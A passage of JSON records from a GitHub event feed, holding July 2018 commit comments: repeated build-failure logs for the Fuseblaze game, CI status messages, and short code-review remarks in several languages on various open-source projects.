CMakeFiles/Fuseblaze.dir/src/hudManager.cpp.o\n[ 77%] Building CXX object CMakeFiles/Fuseblaze.dir/src/main.cpp.o\n[ 77%] Building CXX object CMakeFiles/Fuseblaze.dir/src/mapGenerator.cpp.o\n[ 77%] Building CXX object CMakeFiles/Fuseblaze.dir/src/pickups/medkit.cpp.o\nCMakeFiles/Fuseblaze.dir/build.make:302: recipe for target 'CMakeFiles/Fuseblaze.dir/src/main.cpp.o' failed\nCMakeFiles/Makefile2:220: recipe for target 'CMakeFiles/Fuseblaze.dir/all' failed\nMakefile:83: recipe for target 'all' failed\n\n/home/daid/_tinyci/daid/Fuseblaze/src/editor/editor.cpp: In member function 'sp::Vector2d Editor::toWorld(sp::Vector2d)':\n/home/daid/_tinyci/daid/Fuseblaze/src/editor/editor.cpp:159:1: warning: no return statement in function returning non-void [-Wreturn-type]\n }\n ^\n/home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:21:33: fatal error: dynamicSectorLoader.h: No such file or directory\n #include \"dynamicSectorLoader.h\"\n                                 ^\ncompilation terminated.\nmake[2]: *** [CMakeFiles/Fuseblaze.dir/src/main.cpp.o] Error 1\nmake[2]: *** Waiting for unfinished jobs....\nmake[1]: *** [CMakeFiles/Fuseblaze.dir/all] Error 2\nmake: *** [all] Error 2\n```"}},"created_at":"2018-07-13T05:34:37Z"}
{"id":"7960128482","type":"CommitCommentEvent","actor":{"login":"xoofx"},"repo":{"name":"SharpGenTools/SharpGenTools"},"payload":{"comment":{"id":29695081,"position":6,"line":157,"path":"SharpGen/Transform/MarshalledElementFactory.cs","commit_id":"c0ceb9728ff762163b3dfda682ac5f06057c47ed","created_at":"2018-07-13T05:35:27Z","updated_at":"2018-07-13T05:35:27Z","author_association":"COLLABORATOR","body":"This is related to this https://github.com/sharpdx/SharpDX/issues/1053\r\n\r\nA PointerSize should not be marshalled to void* but should keep the original PointerSize struct."}},"created_at":"2018-07-13T05:35:27Z"}
{"id":"7960129826","type":"CommitCommentEvent","actor":{"login":"mantoni"},"repo":{"name":"sinonjs/lolex"},"payload":{"comment":{"id":29695084,"position":null,"line":null,"path":null,"commit_id":"79f9431a7278509ebffbe107484f521f76b3f665","created_at":"2018-07-13T05:36:00Z","updated_at":"2018-07-13T05:36:00Z","author_association":"MEMBER","body":"Can you tell us which environment defines one of the timer properties in this way?"}},"created_at":"2018-07-13T05:36:00Z"}
{"id":"7960133785","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29695090,"position":null,"line":null,"path":null,"commit_id":"04ad2bcff201f0ac5a19d3c6b416c6a54914567e","created_at":"2018-07-13T05:37:29Z","updated_at":"2018-07-13T05:37:29Z","author_association":"NONE","body":"158913899-Add-single-sided-natural-ventilation-example-file (lgu1234) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-04ad2bcff201f0ac5a19d3c6b416c6a54914567e-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-13T05:37:29Z"}
{"id":"7960137424","type":"CommitCommentEvent","actor":{"login":"NIUJIEYUAN"},"repo":{"name":"goldhadis/wx"},"payload":{"comment":{"id":29695097,"position":3,"line":3,"path":"README.md","commit_id":"5747e502c4fd01f9dca10bcc274a836b8e6faa4d","created_at":"2018-07-13T05:38:53Z","updated_at":"2018-07-13T05:38:53Z","author_association":"NONE","body":"。。。。。等我休息来写，电脑还没修好"}},"created_at":"2018-07-13T05:38:53Z"}
{"id":"7960138050","type":"CommitCommentEvent","actor":{"login":"curioswitch-role"},"repo":{"name":"curioswitch/curiostack"},"payload":{"comment":{"id":29695099,"position":null,"line":null,"path":null,"commit_id":"733cbcf3d5ec3cc49e883509d28d161eed6c03fa","created_at":"2018-07-13T05:39:08Z","updated_at":"2018-07-13T05:39:08Z","author_association":"NONE","body":"Build failed. Check the logs and try again.\n\nLogs:\nhttps://console.cloud.google.com/gcr/builds/e01a1889-a4a2-4823-87a6-567091cc9a72?project=153942441948"}},"created_at":"2018-07-13T05:39:08Z"}
{"id":"7960146079","type":"CommitCommentEvent","actor":{"login":"daid"},"repo":{"name":"daid/Fuseblaze"},"payload":{"comment":{"id":29695106,"position":null,"line":null,"path":null,"commit_id":"025330334c823fbffbc734ff7ef47b73f7eb4744","created_at":"2018-07-13T05:42:09Z","updated_at":"2018-07-13T05:42:09Z","author_association":"OWNER","body":"### TinyCI build failure:\n[make -j 3] returned [2]:\n```[  1%] Built target json11\n[ 11%] Built target box2d\n[ 11%] Built target glew\n[ 39%] Built target sp2freetype\n[ 45%] Built target lua\n[ 76%] Built target bullet\nScanning dependencies of target Fuseblaze\n[ 77%] Building CXX object CMakeFiles/Fuseblaze.dir/src/pickups/weapon.cpp.o\n[ 77%] Building CXX object CMakeFiles/Fuseblaze.dir/src/main.cpp.o\n[ 77%] Building CXX object CMakeFiles/Fuseblaze.dir/src/pickups/pickup.cpp.o\nCMakeFiles/Fuseblaze.dir/build.make:302: recipe for target 'CMakeFiles/Fuseblaze.dir/src/main.cpp.o' failed\nCMakeFiles/Makefile2:220: recipe for target 'CMakeFiles/Fuseblaze.dir/all' failed\nMakefile:83: recipe for target 'all' failed\n\n/home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:21:33: fatal error: dynamicSectorLoader.h: No such file or directory\n #include \"dynamicSectorLoader.h\"\n                                 ^\ncompilation terminated.\nmake[2]: *** [CMakeFiles/Fuseblaze.dir/src/main.cpp.o] Error 1\nmake[2]: *** Waiting for unfinished jobs....\nmake[1]: *** [CMakeFiles/Fuseblaze.dir/all] Error 2\nmake: *** [all] Error 2\n```"}},"created_at":"2018-07-13T05:42:09Z"}
{"id":"7960149935","type":"CommitCommentEvent","actor":{"login":"daid"},"repo":{"name":"daid/Fuseblaze"},"payload":{"comment":{"id":29695113,"position":null,"line":null,"path":null,"commit_id":"025330334c823fbffbc734ff7ef47b73f7eb4744","created_at":"2018-07-13T05:43:39Z","updated_at":"2018-07-13T05:43:39Z","author_association":"OWNER","body":"### TinyCI build failure:\n[make -j 3] returned [2]:\n```[  1%] Built target json11\n[ 11%] Built target box2d\n[ 11%] Built target glew\n[ 39%] Built target sp2freetype\n[ 45%] Built target lua\n[ 76%] Built target bullet\nScanning dependencies of target Fuseblaze\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/src/player.cpp.o\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/src/main.cpp.o\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/src/prefab.cpp.o\nCMakeFiles/Fuseblaze.dir/build.make:302: recipe for target 'CMakeFiles/Fuseblaze.dir/src/main.cpp.o' failed\nCMakeFiles/Makefile2:220: recipe for target 'CMakeFiles/Fuseblaze.dir/all' failed\nMakefile:83: recipe for target 'all' failed\n\n/home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:21:33: fatal error: dynamicSectorLoader.h: No such file or directory\n #include \"dynamicSectorLoader.h\"\n                                 ^\ncompilation terminated.\nmake[2]: *** [CMakeFiles/Fuseblaze.dir/src/main.cpp.o] Error 1\nmake[2]: *** Waiting for unfinished jobs....\nmake[1]: *** [CMakeFiles/Fuseblaze.dir/all] Error 2\nmake: *** [all] Error 2\n```"}},"created_at":"2018-07-13T05:43:39Z"}
{"id":"7960153660","type":"CommitCommentEvent","actor":{"login":"daid"},"repo":{"name":"daid/Fuseblaze"},"payload":{"comment":{"id":29695122,"position":null,"line":null,"path":null,"commit_id":"025330334c823fbffbc734ff7ef47b73f7eb4744","created_at":"2018-07-13T05:45:07Z","updated_at":"2018-07-13T05:45:07Z","author_association":"OWNER","body":"### TinyCI build failure:\n[make -j 3] returned [2]:\n```[  1%] Built target json11\n[ 11%] Built target box2d\n[ 11%] Built target glew\n[ 39%] Built target sp2freetype\n[ 45%] Built target lua\n[ 76%] Built target bullet\nScanning dependencies of target Fuseblaze\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/src/weapons/weapon.cpp.o\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/src/trigger.cpp.o\n[ 76%] Building CXX object CMakeFiles/Fuseblaze.dir/src/main.cpp.o\nCMakeFiles/Fuseblaze.dir/build.make:302: recipe for target 'CMakeFiles/Fuseblaze.dir/src/main.cpp.o' failed\nCMakeFiles/Makefile2:220: recipe for target 'CMakeFiles/Fuseblaze.dir/all' failed\nMakefile:83: recipe for target 'all' failed\n\n/home/daid/_tinyci/daid/Fuseblaze/src/main.cpp:21:33: fatal error: dynamicSectorLoader.h: No such file or directory\n #include \"dynamicSectorLoader.h\"\n                                 ^\ncompilation terminated.\nmake[2]: *** [CMakeFiles/Fuseblaze.dir/src/main.cpp.o] Error 1\nmake[2]: *** Waiting for unfinished jobs....\nmake[1]: *** [CMakeFiles/Fuseblaze.dir/all] Error 2\nmake: *** [all] Error 2\n```"}},"created_at":"2018-07-13T05:45:07Z"}
{"id":"7960154117","type":"CommitCommentEvent","actor":{"login":"hanhou"},"repo":{"name":"ecoluo/Labtools-HH"},"payload":{"comment":{"id":29695126,"position":59,"line":46,"path":"submit_job_ind.sh","commit_id":"d748f79ecd3e9ede74cb5f7cbe0259b7684e750b","created_at":"2018-07-13T05:45:17Z","updated_at":"2018-07-13T05:45:17Z","author_association":"NONE","body":"qsub 这句话应该放在 for ii in `seq 1 5`  循环的外面，再 for 循环一次，因为这里 config[] 还没有填充完毕，会导致前面几个 node 接收不到后面 node 的信息，从而 matlab 中分配任务错误。 @ecoluo "}},"created_at":"2018-07-13T05:45:17Z"}
{"id":"7960154642","type":"CommitCommentEvent","actor":{"login":"hanhou"},"repo":{"name":"ecoluo/Labtools-HH"},"payload":{"comment":{"id":29695127,"position":59,"line":46,"path":"submit_job_ind.sh","commit_id":"d748f79ecd3e9ede74cb5f7cbe0259b7684e750b","created_at":"2018-07-13T05:45:29Z","updated_at":"2018-07-13T05:45:29Z","author_association":"NONE","body":"我的最新 commit 已经修改了这个 bug，并且把之前手动设置的功能也融合进来了。如果不带参数，就自动设置（24 减去已占用 CPU数再减去 4，给服务器留几个 CPU）；如果带参数，就用之前的手动逻辑。"}},"created_at":"2018-07-13T05:45:29Z"}
{"id":"7960156215","type":"CommitCommentEvent","actor":{"login":"rpiaggio"},"repo":{"name":"japgolly/scalajs-react"},"payload":{"comment":{"id":29695130,"position":null,"line":null,"path":null,"commit_id":"6446d73464f5f4836d1af1aff5f750325f8e24f7","created_at":"2018-07-13T05:46:06Z","updated_at":"2018-07-13T05:46:06Z","author_association":"NONE","body":"I stumbled upon this exact same problem and brought it up on the webjar gitter channel. The suggestion came up to use `dependencyOverrides`: https://gitter.im/webjars/webjars?at=5b47a70395e03e3d7b4497fb. (I didn't test it though since I didn't need the transitive dependency and I ended up excluding them.)"}},"created_at":"2018-07-13T05:46:06Z"}
{"id":"7960156779","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"candirufish/Stockfish"},"payload":{"comment":{"id":29695131,"position":null,"line":null,"path":null,"commit_id":"ad5b8883142952c89eb3e68500cd5e5399950e54","created_at":"2018-07-13T05:46:17Z","updated_at":"2018-07-13T05:46:17Z","author_association":"NONE","body":"Congrat too!"}},"created_at":"2018-07-13T05:46:17Z"}
{"id":"7960160717","type":"CommitCommentEvent","actor":{"login":"ElijahLynn"},"repo":{"name":"ElijahLynn/pantheon-d8-composer-project-elijah"},"payload":{"comment":{"id":29695136,"position":null,"line":null,"path":null,"commit_id":"dd0ad92d3b9ae49ba67a65ebd150064f29c0507c","created_at":"2018-07-13T05:47:47Z","updated_at":"2018-07-13T05:47:47Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-elijah#ci-2](https://dashboard.pantheon.io/sites/6e332848-a68a-42aa-9fb5-563febca7197#ci-2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-2-pantheon-d8-composer-project-elijah.pantheonsite.io/)"}},"created_at":"2018-07-13T05:47:47Z"}
{"id":"7960163715","type":"CommitCommentEvent","actor":{"login":"cgcloud-jenkins"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":29695139,"position":null,"line":null,"path":null,"commit_id":"34ce3286b70286c81d76929d91cdcc25e1f4c4c8","created_at":"2018-07-13T05:48:52Z","updated_at":"2018-07-13T05:48:52Z","author_association":"NONE","body":"[Jenkins vg tests](http://jenkins.cgcloud.info/job/vg/2001/) complete for merge to master.  View the [full report here](http://cgl-pipeline-inputs.s3.amazonaws.com/vg_cgl/vg_ci/jenkins_reports/branch/master/index.html).\n\n19 tests passed, 0 tests failed and 10 tests skipped in 20761 seconds\n\nTests produced 2925 warnings. 2925 were for lower-than-expected alignment scores\n\n"}},"created_at":"2018-07-13T05:48:52Z"}
{"id":"7960166315","type":"CommitCommentEvent","actor":{"login":"dwenzel"},"repo":{"name":"matteosavio/t3events"},"payload":{"comment":{"id":29695147,"position":4,"line":191,"path":"Classes/Controller/PerformanceController.php","commit_id":"a2d4e19760841d952b9d5b2e8ca953cf0c0cfad0","created_at":"2018-07-13T05:49:54Z","updated_at":"2018-07-13T05:49:54Z","author_association":"NONE","body":"Hi @matteosavio This should not be necessary since there is a [TitleTagViewhelper](https://github.com/dwenzel/t3events/blob/master/Classes/ViewHelpers/TitleTagViewHelper.php)"}},"created_at":"2018-07-13T05:49:54Z"}
{"id":"7960167192","type":"CommitCommentEvent","actor":{"login":"AR98"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29695148,"position":36,"line":90,"path":"app/src/main/java/com/example/android/miwok/WordAdapter.java","commit_id":"adf90d17fa802b2b5229d29faebee4b3991017b1","created_at":"2018-07-13T05:50:13Z","updated_at":"2018-07-13T05:50:13Z","author_association":"NONE","body":"![image](https://user-images.githubusercontent.com/35477662/42674708-ab0547cc-8625-11e8-9f58-07d97bbe74bc.png)\r\n@vbrrt text_container is id  name of  sub linearlayout inside list_item.xml"}},"created_at":"2018-07-13T05:50:13Z"}
{"id":"7960168554","type":"CommitCommentEvent","actor":{"login":"amandeepmittal"},"repo":{"name":"zeolearn/nodejs-text-tutorial"},"payload":{"comment":{"id":29695151,"position":56,"line":56,"path":"module1.md","commit_id":"b2d5ed1da466a52d893e1357ee581713de978b09","created_at":"2018-07-13T05:50:41Z","updated_at":"2018-07-13T05:50:41Z","author_association":"COLLABORATOR","body":"I have uploaded the REPL.IT code for this code block. Let me know if this works. Only then, I will update rest of the modules."}},"created_at":"2018-07-13T05:50:41Z"}
{"id":"7960171251","type":"CommitCommentEvent","actor":{"login":"camposcristianeze"},"repo":{"name":"gatsbyjs/gatsby"},"payload":{"comment":{"id":29695159,"position":null,"line":null,"path":null,"commit_id":"02965d6bcb31b910ca0a53bf3ed4f5c448ea9198","created_at":"2018-07-13T05:51:42Z","updated_at":"2018-07-13T05:51:42Z","author_association":"NONE","body":"I'm in the same situation here"}},"created_at":"2018-07-13T05:51:42Z"}
{"id":"7960173699","type":"CommitCommentEvent","actor":{"login":"ajrhacker"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29695166,"position":null,"line":null,"path":null,"commit_id":"9eae4365246db04c1b2b432e24b91268b482564c","created_at":"2018-07-13T05:52:36Z","updated_at":"2018-07-13T05:52:36Z","author_association":"CONTRIBUTOR","body":"The non-82072-specific parts of this commit break floppy loading on x68000, which throws up a \"protect\" error with at least a couple of disks from the softlist."}},"created_at":"2018-07-13T05:52:36Z"}
{"id":"7960174082","type":"CommitCommentEvent","actor":{"login":"ygliao"},"repo":{"name":"ygliao/test"},"payload":{"comment":{"id":29695167,"position":null,"line":null,"path":null,"commit_id":"87a12d465f610a14c29ac48df121470f623e7acf","created_at":"2018-07-13T05:52:44Z","updated_at":"2018-07-13T05:52:44Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-13T05:52:44Z"}
{"id":"7960178614","type":"CommitCommentEvent","actor":{"login":"vindard"},"repo":{"name":"peakshift/telegram-dogecoin"},"payload":{"comment":{"id":29695176,"position":null,"line":null,"path":null,"commit_id":"046d68f8c3a415a4b462e8228e25476d46860e2b","created_at":"2018-07-13T05:54:22Z","updated_at":"2018-07-13T05:54:22Z","author_association":"COLLABORATOR","body":"The 'elif' cases under withdrawMsg() aren't in use right now since I can't figure out how to access the status:failed object as yet ([details here](https://stackoverflow.com/questions/51318203/try-except-exception-as-variable)). Once that's figured out though, the 'elif' cases within this function would be used to clean up the error messages and make them appear more natural for Telegram."}},"created_at":"2018-07-13T05:54:22Z"}
{"id":"7960179683","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"candirufish/Stockfish"},"payload":{"comment":{"id":29695177,"position":null,"line":null,"path":null,"commit_id":"ad5b8883142952c89eb3e68500cd5e5399950e54","created_at":"2018-07-13T05:54:47Z","updated_at":"2018-07-13T05:54:47Z","author_association":"NONE","body":"Congratulations!"}},"created_at":"2018-07-13T05:54:47Z"}
{"id":"7960180008","type":"CommitCommentEvent","actor":{"login":"Janak26"},"repo":{"name":"Janak26/Titanic-Survival-Predictions"},"payload":{"comment":{"id":29695179,"position":null,"line":null,"path":null,"commit_id":"b6b630372a9d4ae64b080ce417ef6391a07aa36d","created_at":"2018-07-13T05:54:55Z","updated_at":"2018-07-13T05:54:55Z","author_association":"OWNER","body":"![age-survived-dead](https://user-images.githubusercontent.com/36564287/42674772-ac9f1b30-868e-11e8-8ef1-3a52b77db868.png)\r\n![class-separation](https://user-images.githubusercontent.com/36564287/42674779-b1b3d37c-868e-11e8-907f-0ef8f9c22561.png)\r\n![class-survived-dead](https://user-images.githubusercontent.com/36564287/42674784-b4b47a54-868e-11e8-8719-79223c9f775f.png)\r\n![survived-dead-fare](https://user-images.githubusercontent.com/36564287/42674785-b6be72dc-868e-11e8-9da5-5acaff9f8171.png)\r\n"}},"created_at":"2018-07-13T05:54:55Z"}
{"id":"7960182903","type":"CommitCommentEvent","actor":{"login":"longjinwang"},"repo":{"name":"longjinwang/jiavascript"},"payload":{"comment":{"id":29695185,"position":null,"line":null,"path":null,"commit_id":"54e5170e291076c1e049701cf122917ad51e319b","created_at":"2018-07-13T05:55:51Z","updated_at":"2018-07-13T05:55:51Z","author_association":"OWNER","body":"java "}},"created_at":"2018-07-13T05:55:51Z"}
{"id":"7960185114","type":"CommitCommentEvent","actor":{"login":"Qiaojd"},"repo":{"name":"Qiaojd/hello-world"},"payload":{"comment":{"id":29695189,"position":2,"line":2,"path":"README.md","commit_id":"383be5a9e7c8b75956f6164326d41276203b2d33","created_at":"2018-07-13T05:56:40Z","updated_at":"2018-07-13T05:56:40Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-13T05:56:40Z"}
{"id":"7960186258","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29695191,"position":31,"line":31,"path":"src/Zad5.java","commit_id":"19d560b31e7c68426f3b93602a60098d2dd47e3c","created_at":"2018-07-13T05:57:04Z","updated_at":"2018-07-13T05:57:04Z","author_association":"COLLABORATOR","body":"A wiesz, że rzutujesz na obiekt ? :)"}},"created_at":"2018-07-13T05:57:04Z"}
{"id":"7960187683","type":"CommitCommentEvent","actor":{"login":"Qiaojd"},"repo":{"name":"Qiaojd/hello-world"},"payload":{"comment":{"id":29695194,"position":null,"line":null,"path":null,"commit_id":"383be5a9e7c8b75956f6164326d41276203b2d33","created_at":"2018-07-13T05:57:35Z","updated_at":"2018-07-13T05:57:35Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-13T05:57:35Z"}
{"id":"7960188180","type":"CommitCommentEvent","actor":{"login":"vikaschoudhary16"},"repo":{"name":"jiayingz/community"},"payload":{"comment":{"id":29695197,"position":133,"line":92,"path":"keps/sig-node/00014-resource-api.md","commit_id":"94e968da4c2138ab8396805e59b826465c2e7b2a","created_at":"2018-07-13T05:57:47Z","updated_at":"2018-07-13T05:57:47Z","author_association":"NONE","body":"> computing operators like “greater than”, “less than” at pod creation can be a very slow operation \r\n\r\nThis is true with res class as well. But resource classes will be fewer than CRs. Will there be 'real' difference?"}},"created_at":"2018-07-13T05:57:47Z"}
{"id":"7960188674","type":"CommitCommentEvent","actor":{"login":"Prom4r"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29695198,"position":21,"line":21,"path":"src/Zad6.java","commit_id":"aa2594a92d8a069dca45e41bc413ae3b4032607e","created_at":"2018-07-13T05:57:58Z","updated_at":"2018-07-13T05:57:58Z","author_association":"COLLABORATOR","body":"To, że nie jest wymagane, nie oznacza to, że to jest ok. Pomijanie ciał instrukcji warunkowej i nie tylko, prowadzi często do błędów... "}},"created_at":"2018-07-13T05:57:58Z"}
{"id":"7960193431","type":"CommitCommentEvent","actor":{"login":"vikaschoudhary16"},"repo":{"name":"jiayingz/community"},"payload":{"comment":{"id":29695203,"position":133,"line":92,"path":"keps/sig-node/00014-resource-api.md","commit_id":"94e968da4c2138ab8396805e59b826465c2e7b2a","created_at":"2018-07-13T05:59:40Z","updated_at":"2018-07-13T05:59:40Z","author_association":"NONE","body":"> resource quota control will become harder\r\n\r\nWhy? How is it different from RCs case? only count of resources will be more or any other reasons?"}},"created_at":"2018-07-13T05:59:40Z"}
{"id":"7960196400","type":"CommitCommentEvent","actor":{"login":"kourea"},"repo":{"name":"forezp/SpringcloudConfig"},"payload":{"comment":{"id":29695219,"position":2,"line":2,"path":"respo/config-client-dev.properties","commit_id":"00d32612a38898781bce791a4a845e60a7fbdb4e","created_at":"2018-07-13T06:00:38Z","updated_at":"2018-07-13T06:00:38Z","author_association":"NONE","body":"foo = foo version 4"}},"created_at":"2018-07-13T06:00:38Z"}
{"id":"7960207084","type":"CommitCommentEvent","actor":{"login":"KyleAMathews"},"repo":{"name":"gatsbyjs/gatsby"},"payload":{"comment":{"id":29695236,"position":null,"line":null,"path":null,"commit_id":"02965d6bcb31b910ca0a53bf3ed4f5c448ea9198","created_at":"2018-07-13T06:04:23Z","updated_at":"2018-07-13T06:04:23Z","author_association":"CONTRIBUTOR","body":"It's fixed in beta.32"}},"created_at":"2018-07-13T06:04:23Z"}
{"id":"7960208649","type":"CommitCommentEvent","actor":{"login":"paulpoco"},"repo":{"name":"MultiPoolMiner/MultiPoolMiner"},"payload":{"comment":{"id":29695237,"position":null,"line":null,"path":null,"commit_id":"7c181f40fdbf12d38fb81bf300c1916635ace091","created_at":"2018-07-13T06:04:54Z","updated_at":"2018-07-13T06:04:54Z","author_association":"CONTRIBUTOR","body":"Some of of base algo and variant might have parts backwards?   I.e. ......V7Lite or .....LiteV7 etc."}},"created_at":"2018-07-13T06:04:54Z"}
{"id":"7960209002","type":"CommitCommentEvent","actor":{"login":"toslunar"},"repo":{"name":"okuta/cupy"},"payload":{"comment":{"id":29695238,"position":16,"line":222,"path":"tests/cupy_tests/core_tests/test_internal.py","commit_id":"f5be5492e8641592f9042c637ec021ddf43ecad0","created_at":"2018-07-13T06:05:01Z","updated_at":"2018-07-13T06:05:01Z","author_association":"NONE","body":"Could you test subnormals?"}},"created_at":"2018-07-13T06:05:01Z"}
{"id":"7960209265","type":"CommitCommentEvent","actor":{"login":"vikaschoudhary16"},"repo":{"name":"jiayingz/community"},"payload":{"comment":{"id":29695239,"position":124,"line":84,"path":"keps/sig-node/00014-resource-api.md","commit_id":"94e968da4c2138ab8396805e59b826465c2e7b2a","created_at":"2018-07-13T06:05:06Z","updated_at":"2018-07-13T06:05:06Z","author_association":"NONE","body":"this is same as deleted one. could not find difference"}},"created_at":"2018-07-13T06:05:06Z"}
{"id":"7960210052","type":"CommitCommentEvent","actor":{"login":"jiayingz"},"repo":{"name":"jiayingz/community"},"payload":{"comment":{"id":29695240,"position":133,"line":92,"path":"keps/sig-node/00014-resource-api.md","commit_id":"94e968da4c2138ab8396805e59b826465c2e7b2a","created_at":"2018-07-13T06:05:22Z","updated_at":"2018-07-13T06:05:22Z","author_association":"OWNER","body":"We probably want to change \"at pod creation\" to \"during pod scheduling\". I think the point is, scheduler wants to cache ResourceClass to ComputeResource matching information, and so evaluating those “greater than”, “less than” operators is performed by scheduler when it detects ComputeResource property changes or when it detects ResourceClass changes. As we require ComputeResource property change to be through node drain, the former basically maps to node addition events. ResourceClass changes should also infrequent. If instead we include such computing operators in ContainerSpec, scheduler needs to evaluate these operators during PodFitsNodeResource predicate, which is much more frequent."}},"created_at":"2018-07-13T06:05:22Z"}
{"id":"7960210310","type":"CommitCommentEvent","actor":{"login":"rawrmaan"},"repo":{"name":"jamiebuilds/jamie.build"},"payload":{"comment":{"id":29695241,"position":null,"line":null,"path":null,"commit_id":"b66f185df4c2fb25d7da08ba2529eaff5ec16603","created_at":"2018-07-13T06:05:27Z","updated_at":"2018-07-13T06:05:27Z","author_association":"NONE","body":"This seems really counterproductive to me. Your post is extremely relevant to the HN community and could do a lot of good if people see it there."}},"created_at":"2018-07-13T06:05:27Z"}
{"id":"7960212686","type":"CommitCommentEvent","actor":{"login":"jamiebuilds"},"repo":{"name":"jamiebuilds/jamie.build"},"payload":{"comment":{"id":29695243,"position":null,"line":null,"path":null,"commit_id":"b66f185df4c2fb25d7da08ba2529eaff5ec16603","created_at":"2018-07-13T06:06:14Z","updated_at":"2018-07-13T06:06:14Z","author_association":"OWNER","body":"mmm naw"}},"created_at":"2018-07-13T06:06:14Z"}
{"id":"7960215146","type":"CommitCommentEvent","actor":{"login":"Yamamoto2222"},"repo":{"name":"fujita0622/ajax_task"},"payload":{"comment":{"id":29695246,"position":18,"line":18,"path":"db_connect.php","commit_id":"8a0e49f2156f2cd7255831efe5a47a4ab85bfebd","created_at":"2018-07-13T06:06:59Z","updated_at":"2018-07-13T06:06:59Z","author_association":"COLLABORATOR","body":"@fujita0622 \r\n本来、DB接続はクラス化して、呼び出すのが一般的。\r\n（変数「$db」だけを他のファイルで使用するのは可読性的にも低いので推奨されません。）"}},"created_at":"2018-07-13T06:06:59Z"}
{"id":"7960216397","type":"CommitCommentEvent","actor":{"login":"jiayingz"},"repo":{"name":"jiayingz/community"},"payload":{"comment":{"id":29695249,"position":124,"line":84,"path":"keps/sig-node/00014-resource-api.md","commit_id":"94e968da4c2138ab8396805e59b826465c2e7b2a","created_at":"2018-07-13T06:07:23Z","updated_at":"2018-07-13T06:07:23Z","author_association":"OWNER","body":"just added a missing ` :)."}},"created_at":"2018-07-13T06:07:23Z"}
{"id":"7960219026","type":"CommitCommentEvent","actor":{"login":"jamiebuilds"},"repo":{"name":"jamiebuilds/jamie.build"},"payload":{"comment":{"id":29695256,"position":null,"line":null,"path":null,"commit_id":"b66f185df4c2fb25d7da08ba2529eaff5ec16603","created_at":"2018-07-13T06:08:16Z","updated_at":"2018-07-13T06:08:16Z","author_association":"OWNER","body":"Hey HN, nice to see ya again\r\n\r\n<img width=\"1333\" alt=\"screen shot 2018-07-12 at 11 07 26 pm\" src=\"https://user-images.githubusercontent.com/952783/42675329-65e6cb7c-8628-11e8-828f-5b9393936a58.png\">\r\n"}},"created_at":"2018-07-13T06:08:16Z"}
{"id":"7960219932","type":"CommitCommentEvent","actor":{"login":"Bplotka"},"repo":{"name":"improbable-eng/thanos"},"payload":{"comment":{"id":29695258,"position":12,"line":16,"path":"docs/components/rule.md","commit_id":"c14e33b9ceb37b019bc08d641f9b65c3b6d31f4c","created_at":"2018-07-13T06:08:34Z","updated_at":"2018-07-13T06:08:34Z","author_association":"COLLABORATOR","body":"true"}},"created_at":"2018-07-13T06:08:34Z"}
{"id":"7960220371","type":"CommitCommentEvent","actor":{"login":"adr-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29695259,"position":40,"line":553,"path":"addons/web/static/src/js/views/search/search_view.js","commit_id":"88ab8fa307f82dd0e580d65ab2565f1580d2e485","created_at":"2018-07-13T06:08:43Z","updated_at":"2018-07-13T06:08:43Z","author_association":"NONE","body":"var timeRangeMenuData = this.enableTimeRangeMenu ? this.timeRangeMenu.getData() : {};"}},"created_at":"2018-07-13T06:08:43Z"}
{"id":"7960221786","type":"CommitCommentEvent","actor":{"login":"adr-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29695260,"position":47,"line":549,"path":"addons/web/static/src/js/views/search/search_view.js","commit_id":"88ab8fa307f82dd0e580d65ab2565f1580d2e485","created_at":"2018-07-13T06:09:12Z","updated_at":"2018-07-13T06:09:12Z","author_association":"NONE","body":"timeRangeMenuData: timeRangeMenuData,"}},"created_at":"2018-07-13T06:09:12Z"}
{"id":"7960223450","type":"CommitCommentEvent","actor":{"login":"falldust"},"repo":{"name":"leisure999/GitAAAA"},"payload":{"comment":{"id":29695266,"position":4,"line":11,"path":"MyDemo/src/com/leisure/Main.java","commit_id":"40f8467ca6e1a560aa92796f876a92ba53248d9a","created_at":"2018-07-13T06:09:44Z","updated_at":"2018-07-13T06:09:44Z","author_association":"COLLABORATOR","body":"//hello world"}},"created_at":"2018-07-13T06:09:44Z"}
